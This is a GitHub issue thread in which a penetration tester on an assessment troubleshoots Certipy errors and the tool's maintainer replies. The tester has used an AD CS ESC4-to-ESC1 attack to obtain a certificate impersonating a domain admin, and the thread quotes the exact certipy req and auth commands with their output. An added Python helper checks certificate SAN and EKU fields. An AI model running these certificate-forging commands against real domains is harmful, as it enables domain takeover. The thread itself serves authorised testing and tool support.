Closed ActivateDZA closed 1 year ago
It's usually an indication that the username provided during Kerberos authentication wasn't found. It's a bit difficult for me to see the format of the username/UPN. In the certificate, is the UPN in the user@domain.local format, or how did you create it? Alternatively, during the authentication command, you can specify the username manually. Certipy tries to deduce the username and domain based on the certificate.
If you want more help, can you please send me the output and simply redact the domain and username with generic ones, so I can see if the information passed around is correct?
Here are the commands I used:
certipy req -u 'lowpriv' -p 'password' -ca CA01-CA -target CA01-CA.company-za.com -template WebServer -upn DomainAdmin@company-za.com -dns DC01.company-za.com
Auth command:
certipy auth -pfx DomainAdmin_DC01.pfx -dc-ip 10.0.0.5
The UPN is in the user@localdomain.local format, but I suspect that they might be using their outside domain, i.e. company.com, while the AD is using company-za.com.
I did some more testing, and I realized what your issue is. When you are requesting the certificate, you are specifying both a UPN and a DNS name. It is not necessary to specify both. Regular user accounts do not have a DNS host name, so when you use the DNS option while authenticating, it tries to look up the user based on the DNS name. Instead, try using only the UPN, or select option 0 when prompted while authenticating.
Have a look at my reproduction of your issue.
As you can see, when trying the DNS name, it attempts to authenticate as administrator$ instead of administrator.
Hi Ly4k
Thank you for the speedy reply. I am onsite doing the assessment, and I have tested it with no DNS:
certipy req -u 'REDACTED' -p 'REDACTED' -ca CA01 -target CA01.company-za.com -template WebServer -upn domainadmin@company-za.com
Certipy v4.8.1 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 195
[*] Got certificate with UPN 'domainadmin@company-za.com'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'domainadmin.pfx'
Getting the request works, no worries.
However, when I try to auth:
certipy auth -pfx domainadmin.pfx -dc-ip DC_IP_ADDRESS
Certipy v4.8.1 - by Oliver Lyak (ly4k)
[*] Using principal: domainadmin@company-za.com
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_INCONSISTENT_KEY_PURPOSE(Certificate cannot be used for PKINIT client authentication)
This means that the template does not allow client authentication. Likely, it specifies only server authentication given the name of the template. This means it's not vulnerable to ESC1.
It was vulnerable to ESC4, and I did the attack to make it vulnerable to ESC1, but I will check tomorrow morning and follow up.
Okay, I've heard about this issue before here: https://github.com/ly4k/Certipy/issues/92. I don't know why this error happens in those cases. There might be a delay before it will work.
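Both failures in this thread (the DNS SAN being mapped to a machine account, and the Server Authentication-only EKU producing KDC_ERR_INCONSISTENT_KEY_PURPOSE) are visible in the certificate itself before any Kerberos traffic. Below is an added pre-check (not Certipy's own code) that reports the SAN identities, the principals they map to, and whether the EKU permits client authentication; it assumes the `cryptography` library and uses a constructed self-signed certificate as test data in place of a real PFX.

```python
import datetime
from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID, ObjectIdentifier
UPN_OID = ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")          # SAN otherName: User Principal Name
PKINIT_CLIENT_EKU = ObjectIdentifier("1.3.6.1.5.2.3.4")        # PKINIT client authentication
SMARTCARD_LOGON_EKU = ObjectIdentifier("1.3.6.1.4.1.311.20.2.2")
CLIENT_OK = {ExtendedKeyUsageOID.CLIENT_AUTH, SMARTCARD_LOGON_EKU, PKINIT_CLIENT_EKU,
             ExtendedKeyUsageOID.ANY_EXTENDED_KEY_USAGE}

def pkinit_precheck(cert: x509.Certificate) -> dict:
    """Report what the KDC will see: SAN identities, candidate principals and EKU fitness."""
    upns, dns_names = [], []
    try:
        san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value
        dns_names = san.get_values_for_type(x509.DNSName)
        for other in san.get_values_for_type(x509.OtherName):
            if other.type_id == UPN_OID:      # value is a DER UTF8String (tag 0x0c, 1-byte length)
                upns.append(other.value[2:].decode("utf-8"))
    except x509.ExtensionNotFound:
        pass
    try:
        ekus = set(cert.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value)
        client_auth = bool(ekus & CLIENT_OK)  # Server Auth only -> KDC_ERR_INCONSISTENT_KEY_PURPOSE
    except x509.ExtensionNotFound:
        client_auth = True                    # no EKU extension: certificate is valid for any purpose
    # A UPN maps to a user account; a DNS name maps to the host's machine account ("host$").
    principals = [u.split("@")[0] for u in upns] + [d.split(".")[0] + "$" for d in dns_names]
    return {"upns": upns, "dns": dns_names, "principals": principals, "client_auth": client_auth}

def build_sample_cert(upn=None, dns=None, ekus=()) -> x509.Certificate:
    """Constructed self-signed certificate with the given SAN entries and EKU OID strings (test data)."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "constructed-sample")])
    now = datetime.datetime.now(datetime.timezone.utc)
    builder = (x509.CertificateBuilder().subject_name(name).issuer_name(name)
               .public_key(key.public_key()).serial_number(x509.random_serial_number())
               .not_valid_before(now).not_valid_after(now + datetime.timedelta(days=1)))
    sans = []
    if upn:   # encode the UPN as a DER UTF8String inside the Microsoft otherName
        sans.append(x509.OtherName(UPN_OID, b"\x0c" + bytes([len(upn.encode())]) + upn.encode()))
    if dns:
        sans.append(x509.DNSName(dns))
    if sans:
        builder = builder.add_extension(x509.SubjectAlternativeName(sans), critical=False)
    if ekus:
        builder = builder.add_extension(x509.ExtendedKeyUsage([ObjectIdentifier(e) for e in ekus]), critical=False)
    return builder.sign(key, hashes.SHA256())
```

For a real file, load the certificate with `cryptography.hazmat.primitives.serialization.pkcs12.load_key_and_certificates` and pass it to `pkinit_precheck`.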
Hi
Can someone please assist me with this error, as shown in the image below? I can use ESC1 to get a pfx file for an admin account.
However, when I try to get the TGT, I get the following error message. I have been googling and researching all day but can't get a solid answer.
I can confirm that the account I am requesting for exists.